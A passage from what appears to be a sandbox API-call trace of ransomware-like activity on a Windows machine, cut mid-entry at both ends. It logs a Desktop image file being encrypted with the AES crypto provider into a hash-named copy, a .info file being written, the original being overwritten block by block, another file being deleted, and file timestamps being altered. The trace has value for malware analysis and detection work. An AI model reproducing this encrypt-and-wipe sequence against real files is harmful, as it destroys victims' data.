HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.791] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\cics85oqp.jpg")) returned 1 [0070.791] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.792] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068", lpFilePart=0x0) returned 0x4b [0070.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0070.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\f5f89e0f78370ba0ff833857812ea068"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.792] GetFileType (hFile=0x398) returned 0x1 [0070.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0070.792] GetFileType (hFile=0x398) returned 0x1 [0070.793] SetFileTime (hFile=0x398, lpCreationTime=0x1c0ee748, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0070.793] CloseHandle (hObject=0x398) returned 1 [0070.793] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068", lpFilePart=0x0) returned 0x4b [0070.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0070.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\f5f89e0f78370ba0ff833857812ea068"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.793] GetFileType (hFile=0x398) returned 0x1 [0070.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0070.793] GetFileType (hFile=0x398) returned 0x1 [0070.793] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x1c0ee748, lpLastWriteTime=0x0) returned 1 [0070.793] CloseHandle (hObject=0x398) returned 1 [0070.793] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068", lpFilePart=0x0) returned 0x4b [0070.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0070.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\f5f89e0f78370ba0ff833857812ea068"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.793] GetFileType (hFile=0x398) returned 0x1 [0070.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0070.794] GetFileType (hFile=0x398) returned 0x1 [0070.794] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1c0ee748) returned 1 [0070.794] CloseHandle (hObject=0x398) returned 1 [0070.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.795] CryptAcquireContextW (in: phProv=0x1c0ee598, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1c0ee598*=0x1a5b7610) returned 1 [0070.796] CryptImportKey (in: hProv=0x1a5b7610, pbData=0x2191a98, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1c0ee550 | out: phKey=0x1c0ee550*=0x1a626a60) returned 1 [0070.796] CryptContextAddRef (hProv=0x1a5b7610, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.796] CryptExportKey (in: hKey=0x1a626a60, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1c0ee660 | out: pbData=0x0*, pdwDataLen=0x1c0ee660*=0x1c) returned 1 [0070.796] CryptExportKey (in: hKey=0x1a626a60, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2191b88, pdwDataLen=0x1c0ee660 | out: pbData=0x2191b88*, pdwDataLen=0x1c0ee660*=0x1c) returned 1 [0070.796] CryptImportKey (in: hProv=0x1a5b7610, pbData=0x2191ca8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1c0ee520 | out: phKey=0x1c0ee520*=0x1a626c20) returned 1 [0070.796] CryptContextAddRef (hProv=0x1a5b7610, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.796] CryptContextAddRef (hProv=0x1a5b7610, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.796] CryptDuplicateKey (in: hKey=0x1a626c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x1c0ee510 | out: phKey=0x1c0ee510*=0x1a626c90) returned 1 [0070.796] CryptContextAddRef (hProv=0x1a5b7610, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.796] CryptSetKeyParam (hKey=0x1a626c90, dwParam=0x4, pbData=0x2191df0*=0x1, dwFlags=0x0) returned 1 [0070.796] CryptSetKeyParam (hKey=0x1a626c90, dwParam=0x1, pbData=0x2191da0, dwFlags=0x0) returned 1 [0070.796] CryptDestroyKey (hKey=0x1a626c20) returned 1 [0070.796] CryptReleaseContext (hProv=0x1a5b7610, dwFlags=0x0) returned 1 [0070.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0edf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee460) returned 1 [0070.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\otdkuc0245.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.797] GetFileType (hFile=0x398) returned 0x1 [0070.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3d0) returned 1 [0070.797] GetFileType (hFile=0x398) returned 0x1 [0070.797] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6", nBufferLength=0x105, lpBuffer=0x1c0edf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6", lpFilePart=0x0) returned 0x4b [0070.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee460) returned 1 [0070.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\8e09ce7d63482f96cd93d3541f916db6"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x300 [0070.797] GetFileType (hFile=0x300) returned 0x1 [0070.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3d0) returned 1 [0070.797] GetFileType (hFile=0x300) returned 0x1 [0070.797] ReadFile (in: hFile=0x398, lpBuffer=0x21921a8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1c0ee558, lpOverlapped=0x0 | out: lpBuffer=0x21921a8*, lpNumberOfBytesRead=0x1c0ee558*=0x11131, lpOverlapped=0x0) returned 1 [0070.799] CryptEncrypt (in: hKey=0x1a626c90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21a61c0*, pdwDataLen=0x1c0ee5b0*=0x11130, dwBufLen=0x11130 | out: pbData=0x21a61c0*, pdwDataLen=0x1c0ee5b0*=0x11130) returned 1 [0070.799] WriteFile (in: hFile=0x300, lpBuffer=0x21a61c0*, nNumberOfBytesToWrite=0x11130, lpNumberOfBytesWritten=0x1c0ee548, lpOverlapped=0x0 | out: lpBuffer=0x21a61c0*, lpNumberOfBytesWritten=0x1c0ee548*=0x11130, lpOverlapped=0x0) returned 1 [0070.801] ReadFile (in: hFile=0x398, lpBuffer=0x21921a8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1c0ee558, lpOverlapped=0x0 | out: lpBuffer=0x21921a8*, lpNumberOfBytesRead=0x1c0ee558*=0x0, lpOverlapped=0x0) returned 1 [0070.801] CryptEncrypt (in: hKey=0x1a626c90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21b7330*, pdwDataLen=0x1c0ee4f0*=0x10, dwBufLen=0x10 | out: pbData=0x21b7330*, pdwDataLen=0x1c0ee4f0*=0x10) returned 1 [0070.801] CryptEncrypt (in: hKey=0x1a626c90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x21b7380*, pdwDataLen=0x1c0ee4f0*=0x0, dwBufLen=0x10 | out: pbData=0x21b7380*, pdwDataLen=0x1c0ee4f0*=0x10) returned 1 [0070.801] WriteFile (in: hFile=0x300, lpBuffer=0x21b73d0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1c0ee478, lpOverlapped=0x0 | out: lpBuffer=0x21b73d0*, lpNumberOfBytesWritten=0x1c0ee478*=0x10, lpOverlapped=0x0) returned 1 [0070.801] CloseHandle (hObject=0x300) returned 1 [0070.803] CloseHandle (hObject=0x398) returned 1 [0070.803] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0070.803] CryptReleaseContext (hProv=0x1a5b7610, dwFlags=0x0) returned 1 [0070.803] CryptReleaseContext (hProv=0x1a5b7610, dwFlags=0x0) returned 1 [0070.803] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6", nBufferLength=0x105, lpBuffer=0x1c0edfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6", lpFilePart=0x0) returned 0x4b [0070.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee490) returned 1 [0070.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\8e09ce7d63482f96cd93d3541f916db6"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.803] GetFileType (hFile=0x398) returned 0x1 [0070.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee400) returned 1 [0070.803] GetFileType (hFile=0x398) returned 0x1 [0070.803] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.804] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.806] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.807] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.851] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.851] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.851] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.851] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.851] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.851] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.852] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.852] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.852] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.852] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.852] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.852] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.852] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.852] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x140, lpOverlapped=0x0) returned 1 [0070.852] ReadFile (in: hFile=0x398, lpBuffer=0x21b8ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x21b8ac8*, lpNumberOfBytesRead=0x1c0ee578*=0x0, lpOverlapped=0x0) returned 1 [0070.853] CloseHandle (hObject=0x398) returned 1 [0070.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6.info", nBufferLength=0x105, lpBuffer=0x1c0edd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6.info", lpFilePart=0x0) returned 0x50 [0070.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee210) returned 1 [0070.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\8e09ce7d63482f96cd93d3541f916db6.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.855] GetFileType (hFile=0x398) returned 0x1 [0070.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee180) returned 1 [0070.855] GetFileType (hFile=0x398) returned 0x1 [0070.855] WriteFile (in: hFile=0x398, lpBuffer=0x2205bd8*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1c0ee2e8, lpOverlapped=0x0 | out: lpBuffer=0x2205bd8*, lpNumberOfBytesWritten=0x1c0ee2e8*=0x77d, lpOverlapped=0x0) returned 1 [0070.856] CloseHandle (hObject=0x398) returned 1 [0070.857] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee5a0) returned 1 [0070.857] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\otdkuc0245.png"), fInfoLevelId=0x0, lpFileInformation=0x1c0ee680 | out: lpFileInformation=0x1c0ee680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d0c60e0, ftCreationTime.dwHighDateTime=0x1d4cda6, ftLastAccessTime.dwLowDateTime=0xa7f46660, ftLastAccessTime.dwHighDateTime=0x1d4cd8a, ftLastWriteTime.dwLowDateTime=0xa7f46660, ftLastWriteTime.dwHighDateTime=0x1d4cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x11131)) returned 1 [0070.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee560) returned 1 [0070.857] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.857] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", dwFileAttributes=0x80) returned 1 [0070.857] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee5e0) returned 1 [0070.858] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\otdkuc0245.png"), fInfoLevelId=0x0, lpFileInformation=0x220d7d0 | out: lpFileInformation=0x220d7d0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6d0c60e0, ftCreationTime.dwHighDateTime=0x1d4cda6, ftLastAccessTime.dwLowDateTime=0xa7f46660, ftLastAccessTime.dwHighDateTime=0x1d4cd8a, ftLastWriteTime.dwLowDateTime=0xa7f46660, ftLastWriteTime.dwHighDateTime=0x1d4cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x11131)) returned 1 [0070.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5a0) returned 1 [0070.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0edff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4d0) returned 1 [0070.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\otdkuc0245.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.858] GetFileType (hFile=0x398) returned 0x1 [0070.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee440) returned 1 [0070.858] GetFileType (hFile=0x398) returned 0x1 [0070.858] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0070.859] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.860] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.860] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.861] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.862] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.863] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.863] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.864] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.865] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.866] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.866] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.867] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, 